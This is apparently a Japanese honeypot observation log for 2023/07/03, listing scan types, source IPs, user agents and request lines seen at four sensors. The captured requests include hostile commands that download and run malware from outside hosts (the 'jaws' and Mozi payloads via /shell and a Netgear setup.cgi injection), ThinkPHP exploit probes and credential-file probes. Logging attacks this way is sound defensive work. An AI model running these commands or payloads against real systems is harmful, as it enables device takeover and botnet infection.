コンニチハレバレトシタアオゾラ

つれづれなるままに、日暮らし、ぶろぐにむかひて、心にうつりゆくよしなしごとを、そこはかとなく書きつくれば、

2023/07/03 ハニーポット(仮) 観測記録

ハニーポット(仮) 観測記録 2023/07/03分です。

特徴
共通

GPONルータの脆弱性を狙うアクセス
Liferay Portal JSON Web Serviceの脆弱性(CVE-2020-7961)を狙うアクセス
PHPUnit脆弱性(CVE-2017-9841)を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
/.envへのスキャン行為
Apache Solrへのスキャン行為
Laravelへのスキャン行為

Location:JP

aiohttpによるスキャン行為
/.gitへのスキャン行為
phpMyAdminへのスキャン行為

を確認しました。

Location:US

CensysInspectによるスキャン行為
.jsへのスキャン行為
/.gitへのスキャン行為
UserAgentがHello, worldであるアクセス

を確認しました。

/shellに対する以下のアクセスを確認しました。

cd /tmp;
rm -rf *;
wget 103.16.161.29/jaws;
sh /tmp/jaws
Location:UK

aiohttpによるスキャン行為
zgrabによるスキャン行為
.jsへのスキャン行為
/.awsへのスキャン行為
/.gitへのスキャン行為

を確認しました。

Location:SG

NetGear製品の脆弱性を狙うアクセス
CensysInspectによるスキャン行為
aiohttpによるスキャン行為
.jsへのスキャン行為
UserAgentがHello, Worldであるアクセス

を確認しました。

アクセス数推移

JP:総アクセス数:278 (前日比:63)
US:総アクセス数:117 (前日比:-23)
UK:総アクセス数:111 (前日比:4)
SG:総アクセス数:107 (前日比:-162)

都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。

Location:JP

送信元IPアドレス一覧

件数 送信元IPアドレス
1 2.58.113.24 Germany
71 18.207.255.197 United States
2 34.223.59.186 United States
19 43.154.141.71 Singapore
1 45.56.108.128 United States
1 45.79.181.94 United States
1 45.79.181.251 United States
1 45.86.200.163 Netherlands
3 45.86.200.164 Netherlands
3 45.86.200.165 Netherlands
4 45.86.200.166 Netherlands
2 45.86.200.167 Netherlands
1 45.86.200.168 Netherlands
4 45.86.200.170 Netherlands
5 45.86.200.171 Netherlands
2 45.86.200.172 Netherlands
3 45.86.200.173 Netherlands
2 45.86.200.174 Netherlands
4 45.86.200.175 Netherlands
3 45.86.200.176 Netherlands
3 45.86.200.177 Netherlands
2 45.86.200.178 Netherlands
2 45.86.200.179 Netherlands
2 45.86.200.180 Netherlands
2 45.86.200.181 Netherlands
3 45.86.200.182 Netherlands
1 45.86.200.183 Netherlands
3 45.86.200.184 Netherlands
3 45.86.200.185 Netherlands
3 45.86.200.186 Netherlands
5 45.86.200.187 Netherlands
3 45.86.200.188 Netherlands
1 45.86.200.189 Netherlands
2 45.86.200.190 Netherlands
1 45.86.200.191 Netherlands
2 45.86.200.192 Netherlands
1 45.86.200.193 Netherlands
2 45.86.200.194 Netherlands
2 45.86.200.196 Netherlands
2 45.86.200.197 Netherlands
7 45.86.200.198 Netherlands
3 45.86.200.199 Netherlands
3 45.86.200.200 Netherlands
5 45.86.200.201 Netherlands
3 45.86.200.202 Netherlands
2 45.86.200.203 Netherlands
1 45.86.200.204 Netherlands
2 45.86.200.205 Netherlands
7 45.86.200.206 Netherlands
1 45.86.200.207 Netherlands
3 45.86.200.208 Netherlands
3 45.86.200.209 Netherlands
4 45.86.200.210 Netherlands
2 45.86.200.211 Netherlands
2 45.86.200.212 Netherlands
1 45.88.90.105 Bulgaria
2 45.128.232.62 Bulgaria
1 50.7.85.42 United States
1 64.62.197.77 United States
1 64.62.197.90 United States
1 79.124.59.170 Bulgaria
6 83.97.73.89 Germany
1 104.192.0.50 United States
1 113.118.204.104 China
1 118.126.124.10 China
3 124.70.204.132 China
13 135.125.244.48 France
2 138.91.138.17 United States
1 163.123.142.205 United States
1 172.104.11.34 United States
1 172.104.11.51 United States
1 172.105.128.12 United States
1 179.43.162.94 Panama
1 179.43.190.98 Panama
2 185.82.72.7 Netherlands
1 185.224.128.219 Netherlands
1 185.241.208.92 Netherlands
4 185.254.196.173 Ukraine
1 192.227.173.18 United States
1 198.235.24.121 United States
1 205.210.31.139 United States
1 209.141.33.65 United States

UserAgent一覧

件数 UserAgent
10 -
2 Go-http-client/1.1
2 Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30
2 Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:105.0) Gecko/20100101 Firefox/105.0
70 Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0
3 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36
9 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36
4 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
1 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36
4 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.0 Safari/605.1.15
1 Mozilla/5.0 (OS/2; Warp 4.5; rv:31.0) Gecko/20100101 Firefox/31.0
3 Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3464.0 Safari/537.36
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36
6 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36
47 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36
3 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
6 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
24 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36
15 Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
9 Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0
2 Mozilla/5.0 (Windows NT 10.0; rv:105.0) Gecko/20100101 Firefox/105.0
4 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36
19 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
11 Mozilla/5.0 (X11; Linux x86_64; rv:105.0) Gecko/20100101 Firefox/105.0
4 Mozilla/5.0 (X11; Linux x86_64; rv:106.0) Gecko/20100101 Firefox/106.0
5 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:105.0) Gecko/20100101 Firefox/105.0
4 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0
2 Python-urllib/3.6
1 Python/3.6 aiohttp/3.8.3
1 Python/3.7 aiohttp/3.7.4.post0
1 python-requests/2.25.1

リクエスト内容一覧

件数 Method Request Protocol
7 \x16\x03\x01
1 ``
1 CONNECT google[.]com:443 HTTP/1.1
1 GET /#/login HTTP/1.0
1 GET /.DS_Store HTTP/1.1
1 GET /.__info.php HTTP/1.1
2 GET /.env.development HTTP/1.1
2 GET /.env.dist HTTP/1.1
2 GET /.env.old HTTP/1.1
2 GET /.env.prod HTTP/1.1
2 GET /.env.production HTTP/1.1
2 GET /.env.project HTTP/1.1
2 GET /.env.save HTTP/1.1
24 GET /.env HTTP/1.1
2 GET /.git/HEAD HTTP/1.1
2 GET /.git/config HTTP/1.1
1 GET /.info.php HTTP/1.1
2 GET /.json HTTP/1.1
1 GET /.vscode/sftp.json HTTP/1.1
1 GET /0.0_phpinfo.php HTTP/1.1
1 GET /00_server_info.php HTTP/1.1
1 GET /02-info.php HTTP/1.1
1 GET /1_1_PhpInfo.php HTTP/1.1
1 GET /5info.php HTTP/1.1
1 GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1
1 GET /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php> HTTP/1.1
1 GET /?phpinfo=-1 HTTP/1.1
2 GET /?phpinfo=1 HTTP/1.1
1 GET /AwsConfig.json HTTP/1.1
1 GET /__info.php HTTP/1.1
1 GET /_ignition/execute-solution HTTP/1.1
1 GET /_info-backoffice.php HTTP/1.1
1 GET /_info.php HTTP/1.1
1 GET /_phpinf.php HTTP/1.1
1 GET /_phpinfo.php HTTP/1.1
1 GET /_poopinfo.php HTTP/1.1
2 GET /_profiler/phpinfo HTTP/1.1
2 GET /admin-app/.env HTTP/1.1
2 GET /api/.env HTTP/1.1
1 GET /api/index.php/v1/config/application?public=true HTTP/1.1
2 GET /app/.env HTTP/1.1
2 GET /application/.env HTTP/1.1
2 GET /apps/.env HTTP/1.1
1 GET /aws.json HTTP/1.1
1 GET /awsconfig.json HTTP/1.1
2 GET /back/.env HTTP/1.1
1 GET /boaform/admin/formLogin?username=admin&psd=admin HTTP/1.0
2 GET /cms/.env HTTP/1.1
1 GET /conf.json HTTP/1.1
2 GET /config.json HTTP/1.1
1 GET /console/ HTTP/1.1
2 GET /core/.env HTTP/1.1
2 GET /cp/.env HTTP/1.1
1 GET /db.json HTTP/1.1
1 GET /debug/default/view.html HTTP/1.1
1 GET /debug/default/view?panel=config/frontend_dev.php HTTP/1.1
2 GET /debug/default/view?panel=config HTTP/1.1
1 GET /debug/default/view HTTP/1.1
2 GET /development/.env HTTP/1.1
3 GET /docker/.env HTTP/1.1
1 GET /env.json HTTP/1.1
2 GET /enviroments/.env.production HTTP/1.1
2 GET /enviroments/.env HTTP/1.1
2 GET /favicon.ico HTTP/1.1
2 GET /fedex/.env HTTP/1.1
1 GET /frontend/web/debug/default/view HTTP/1.1
2 GET /frontend_dev.php/$ HTTP/1.1
1 GET /geoserver/web/ HTTP/1.1
1 GET /home.asp HTTP/1.1
1 GET /html/phpinfo.php HTTP/1.1
1 GET /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 HTTP/1.1
2 GET /info.php HTTP/1.1
2 GET /laravel/.env HTTP/1.1
2 GET /live_env HTTP/1.1
2 GET /local/.env HTTP/1.1
2 GET /phpinfo.php HTTP/1.1
1 GET /phpinfo HTTP/1.1
1 GET /phpmyadmin/index.php HTTP/1.1
1 GET /phpmyadmin4.8.5/index.php HTTP/1.1
1 GET /pmd/index.php HTTP/1.1
2 GET /private/.env HTTP/1.1
2 GET /rest/.env HTTP/1.1
1 GET /s3cmd.ini HTTP/1.1
1 GET /sapi/debug/default/view HTTP/1.1
2 GET /script/.env HTTP/1.1
1 GET /sendgrid.json HTTP/1.1
2 GET /shared/.env HTTP/1.1
1 GET /smtp.json HTTP/1.1
1 GET /solr/admin/info/system?wt=json HTTP/1.1
2 GET /sources/.env HTTP/1.1
1 GET /symfony/public/_profiler/phpinfo HTTP/1.1
2 GET /system/.env HTTP/1.1
1 GET /systembc/password.php HTTP/1.0
1 GET /tool/view/phpinfo.view.php HTTP/1.1
1 GET /v3/time HTTP/1.1
1 GET /web/debug/default/view HTTP/1.1
19 HEAD /Core/Skin/Login.aspx HTTP/1.1
1 HEAD / HTTP/1.1
2 POST /.env.development HTTP/1.1
2 POST /.env.dist HTTP/1.1
2 POST /.env.old HTTP/1.1
2 POST /.env.prod HTTP/1.1
2 POST /.env.production HTTP/1.1
2 POST /.env.project HTTP/1.1
2 POST /.env.save HTTP/1.1
2 POST /.env HTTP/1.1
2 POST /admin-app/.env HTTP/1.1
1 POST /admin/ckeditor/plugins/ajaxplorer/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST /admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
2 POST /api/.env HTTP/1.1
1 POST /api/vendor/phpunit/phpunit/src/Util/PHP/Template/eval-stdin.php HTTP/1.1
1 POST /api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
2 POST /app/.env HTTP/1.1
2 POST /application/.env HTTP/1.1
2 POST /apps/.env HTTP/1.1
2 POST /back/.env HTTP/1.1
4 POST /boaform/admin/formLogin HTTP/1.1
2 POST /cms/.env HTTP/1.1
2 POST /core/.env HTTP/1.1
2 POST /cp/.env HTTP/1.1
2 POST /development/.env HTTP/1.1
3 POST /docker/.env HTTP/1.1
2 POST /enviroments/.env.production HTTP/1.1
2 POST /enviroments/.env HTTP/1.1
2 POST /fedex/.env HTTP/1.1
1 POST /lab/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
2 POST /laravel/.env HTTP/1.1
1 POST /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST /laravel_web/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST /laravelao/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST /lib/phpunit/Util/PHP/eval-stdin.php HTTP/1.1
1 POST /lib/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1
2 POST /lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
2 POST /lib/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST /libraries/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
2 POST /live_env HTTP/1.1
2 POST /local/.env HTTP/1.1
1 POST /phpunit/Util/PHP/eval-stdin.php HTTP/1.1
1 POST /phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1
1 POST /phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST /phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
2 POST /private/.env HTTP/1.1
2 POST /rest/.env HTTP/1.1
2 POST /script/.env HTTP/1.1
2 POST /shared/.env HTTP/1.1
2 POST /sources/.env HTTP/1.1
2 POST /system/.env HTTP/1.1
1 POST /vendor/phpunit/Util/PHP/eval-stdin.php HTTP/1.1
1 POST /vendor/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1
1 POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST /vendor/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
Location:US

送信元IPアドレス一覧

件数 送信元IPアドレス
1 45.12.253.248 Bulgaria
1 45.33.80.243 United States
1 45.79.172.21 United States
1 45.79.181.94 United States
1 45.79.181.104 United States
1 45.79.181.179 United States
2 45.79.181.223 United States
2 45.79.181.251 United States
1 45.128.232.62 Bulgaria
1 50.7.85.42 United States
25 51.79.29.48 Canada
4 54.36.115.221 France
2 74.82.47.2 United States
1 79.124.59.170 Bulgaria
16 83.97.73.89 Germany
1 103.178.228.45 Vietnam
2 109.237.98.235 Russia
2 129.114.108.101 United States
1 134.122.26.255 United States
9 138.197.80.149 United States
2 162.142.125.214 United States
10 164.92.250.15 United States
10 165.227.128.59 United States
2 167.94.138.126 United States
1 170.64.140.131 United States
3 172.104.11.4 United States
1 172.105.128.12 United States
1 179.60.147.13 Belize
1 185.180.143.140 Portugal
1 185.224.128.219 Netherlands
1 192.155.90.118 United States
1 192.241.217.10 United States
2 193.56.29.131 United Kingdom
1 194.59.31.19 Bulgaria
1 194.165.16.73 Panama
1 198.46.154.138 United States
1 198.235.24.143 United States
1 198.235.24.193 United States
1 205.210.31.14 United States

UserAgent一覧

件数 UserAgent
35 -
1 Go-http-client/1.1
1 Hello, world
1 Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30
1 Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:102.0) Gecko/20100101 Firefox/102.0
17 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
16 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
34 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
1 Mozilla/5.0 (X11; Linux x86_64; rv:107.0) Gecko/20100101 Firefox/107.0
1 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0
2 Mozilla/5.0 (compatible; CensysInspect/1.1; +https[:]//about[.]censys[.]io/)
3 Mozilla/5.0
2 python-requests/2.28.1
1 xxx

リクエスト内容一覧

件数 Method Request Protocol
1 MGLNDD_34.68.118.83_80\n
2 \x03
1 \x16\x03\x01\x02
27 \x16\x03\x01
1 ``
1 CONNECT google[.]com:443 HTTP/1.1
1 GET /#/login HTTP/1.0
34 GET /.env HTTP/1.1
1 GET /.git/config HTTP/1.1
3 GET /1.php HTTP/1.1
2 GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1
2 GET /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php> HTTP/1.1
1 GET /_ignition/execute-solution HTTP/1.1
3 GET /bundle.js HTTP/1.1
2 GET /cdn-cgi/trace HTTP/1.1
3 GET /client/get_targets HTTP/1.1
1 GET /console/ HTTP/1.1
7 GET /favicon.ico HTTP/1.1
2 GET /files/ HTTP/1.1
3 GET /geoip/ HTTP/1.1
1 GET /geoserver/web/ HTTP/1.1
2 GET /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 HTTP/1.1
1 GET /shell?cd+/tmp;rm+-rf+*;wget+103[.]16[.]161[.]29/jaws;sh+/tmp/jaws HTTP/1.1
2 GET /solr/admin/info/system?wt=json HTTP/1.1
3 GET /upl.php HTTP/1.1
2 GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
2 POST /Autodiscover/Autodiscover.xml HTTP/1.1
1 POST /api/v0/id HTTP/1.1
1 POST /boaform/admin/formLogin HTTP/1.1
2 POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
2 PRI * HTTP/2.0
Location:UK

送信元IPアドレス一覧

件数 送信元IPアドレス
1 2.58.113.24 Germany
3 5.61.52.159 United Kingdom
1 42.122.152.83 China
1 45.79.181.104 United States
2 45.79.181.223 United States
1 45.79.181.251 United States
1 45.156.128.12 Hungary
1 45.156.129.2 Hungary
5 51.79.29.48 Canada
11 54.37.79.75 France
1 66.240.192.82 United States
1 79.124.59.170 Bulgaria
7 83.97.73.89 Germany
1 84.17.52.48 United Kingdom
1 118.126.124.10 China
10 143.244.160.142 United States
1 157.230.99.127 United States
2 157.230.99.148 United States
10 164.92.254.255 United States
1 172.104.11.34 United States
3 172.104.11.51 United States
2 172.105.128.12 United States
2 178.128.84.112 United States
5 179.43.154.248 Panama
2 184.105.247.196 United States
1 185.224.128.219 Netherlands
2 188.166.71.161 United States
1 188.239.191.216 Germany
1 192.155.90.118 United States
1 192.155.90.220 United States
1 194.165.16.73 Panama
1 198.235.24.24 United States
1 205.210.31.27 United States
26 220.94.228.163 South Korea

UserAgent一覧

件数 UserAgent
52 -
3 FooBarTest
12 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 OPR/95.0.0.0
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
2 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
7 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
1 Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.154 Safari/537.36 OPR/20.0.1387.91
1 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.20 Safari/535.1
1 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.166 Safari/537.36 OPR/20.0.1396.73172
16 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
1 Mozilla/5.0 (X11; U; Linux; i686; en-US; rv:1.6) Gecko Debian/1.6-7
1 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0
1 Mozilla/5.0 (iPad; CPU OS 10_0 like Mac OS X) AppleWebKit/601.1 (KHTML, like Gecko) CriOS/49.0.2623.109 Mobile/14A5335b Safari/601.1.46
4 Mozilla/5.0 zgrab/0.x
4 Mozilla/5.0
1 Python/3.6 aiohttp/3.8.3

リクエスト内容一覧

件数 Method Request Protocol
1 *1
1 SSH-2.0-Go
1 \n
6 \x03
1 \x05d\x05\xc9
1 \x16\x03\x01\x01\x9e\x01
2 \x16\x03\x01\x01\xa8\x01
1 \x16\x03\x01\x01\xb5\x01
29 \x16\x03\x01
1 \x16\x03\x02\x01\x9b\x01
1 \x16\x03\x03\x01I\x01
1 \x16\x03\x03\x01W\x01
1 \x16\x03\x03\x01\x9a\x01
2 \x16\x03\x03\x01\xa6\x01
1 ``
1 GET /#/login HTTP/1.0
1 GET /.aws/credentials HTTP/1.1
17 GET /.env HTTP/1.1
1 GET /.git/config HTTP/1.1
2 GET /1.php HTTP/1.1
1 GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1
1 GET /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php> HTTP/1.1
1 GET /Dockerrun.aws.json HTTP/1.1
1 GET /_ignition/execute-solution HTTP/1.1
2 GET /aaa9 HTTP/1.1
2 GET /aab8 HTTP/1.1
2 GET /bundle.js HTTP/1.1
2 GET /cdn-cgi/trace HTTP/1.1
2 GET /client/get_targets HTTP/1.1
1 GET /console/ HTTP/1.1
5 GET /favicon.ico HTTP/1.1
2 GET /files/ HTTP/1.1
2 GET /geoip/ HTTP/1.1
1 GET /geoserver/web/ HTTP/1.1
1 GET /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 HTTP/1.1
1 GET /s3cmd.ini HTTP/1.1
1 GET /solr/admin/info/system?wt=json HTTP/1.1
2 GET /upl.php HTTP/1.1
1 GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 GET http[:]//dyn[.]epicgifs[.]net/test6956.php HTTP/1.1
3 GET http[:]//test[.]getproxylist[.]com/ HTTP/1.1
1 HEAD / HTTP/1.1
1 POST /boaform/admin/formLogin HTTP/1.1
1 POST /ipp HTTP/1.1
1 fox a 1 -1 fox hello\n
Location:SG

送信元IPアドレス一覧

件数 送信元IPアドレス
1 2.57.122.23 Romania
1 27.41.24.12 China
1 45.56.108.128 United States
2 45.79.172.21 United States
1 45.79.181.94 United States
1 45.79.181.179 United States
1 45.79.181.223 United States
1 45.79.181.251 United States
1 45.88.90.105 Bulgaria
1 45.128.232.62 Bulgaria
1 45.135.232.28 Russia
3 45.140.17.16 Russia
5 51.79.29.48 Canada
2 51.81.235.253 United States
22 54.36.115.221 France
1 58.222.117.98 China
1 79.124.59.170 Bulgaria
9 83.97.73.89 Germany
1 87.251.64.11 Russia
1 91.191.209.202 Bulgaria
4 109.237.97.180 Russia
2 109.237.98.235 Russia
1 118.126.124.10 China
9 143.198.90.204 United States
10 143.244.160.142 United States
2 156.59.103.48 Singapore
2 162.142.125.214 United States
3 172.104.11.51 United States
2 172.105.128.12 United States
3 179.43.154.248 Panama
2 183.136.225.32 China
2 184.105.139.68 United States
1 185.224.128.219 Netherlands
1 192.155.90.118 United States
1 193.233.133.196 United States
1 194.165.16.76 Panama
1 198.199.118.125 United States
1 205.185.116.25 United States
1 205.210.31.38 United States
1 205.210.31.129 United States

UserAgent一覧

件数 UserAgent
34 -
1 Go-http-client/1.1
1 Hello, World
1 Mozilla/4.0 (compatible; MSIE 6.0; j2me) ReqwirelessWeb/3.5
1 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
1 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36
12 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 Edg/110.0.1587.57
9 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
1 Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/109.0
2 Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE
1 Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:42.0) Gecko/20100101 Firefox/42.0 Cyberfox/42.0.1 Time/1688244141480
1 Mozilla/5.0 (X11; Linux i686 on x86_64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Fennec/2.0.1
1 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
33 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
1 Mozilla/5.0 (X11; U; Linux i586; en-US; rv:1.7.3) Gecko/20040924 Epiphany/1.4.4 (Ubuntu)
1 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0
1 Mozilla/5.0 (compatible; CensysInspect/1.1; +https[:]//about[.]censys[.]io/)
2 Mozilla/5.0
1 Python/3.6 aiohttp/3.8.3

リクエスト内容一覧

件数 Method Request Protocol
2 -
1 MGLNDD_13.67.44.234_80
5 \x03
2 \x16\x03\x01\x01H\x01
20 \x16\x03\x01
1 ``
1 GET /#/login HTTP/1.0
34 GET /.env HTTP/1.1
2 GET /1.php HTTP/1.1
1 GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1
1 GET /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php> HTTP/1.1
1 GET /Dockerrun.aws.json HTTP/1.1
1 GET /_ignition/execute-solution HTTP/1.1
2 GET /bundle.js HTTP/1.1
2 GET /client/get_targets HTTP/1.1
1 GET /console/ HTTP/1.1
9 GET /favicon.ico HTTP/1.1
2 GET /files/ HTTP/1.1
2 GET /geoip/ HTTP/1.1
1 GET /geoserver/web/ HTTP/1.1
1 GET /home.asp HTTP/1.1
1 GET /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 HTTP/1.1
1 GET /robots.txt HTTP/1.1
1 GET /s3cmd.ini HTTP/1.1
1 GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//27[.]41[.]24[.]12:42608/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
1 GET /solr/admin/info/system?wt=json HTTP/1.1
1 GET /systembc/password.php HTTP/1.0
2 GET /upl.php HTTP/1.1
1 GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 HEAD / HTTP/1.1
1 POST /Autodiscover/Autodiscover.xml HTTP/1.1
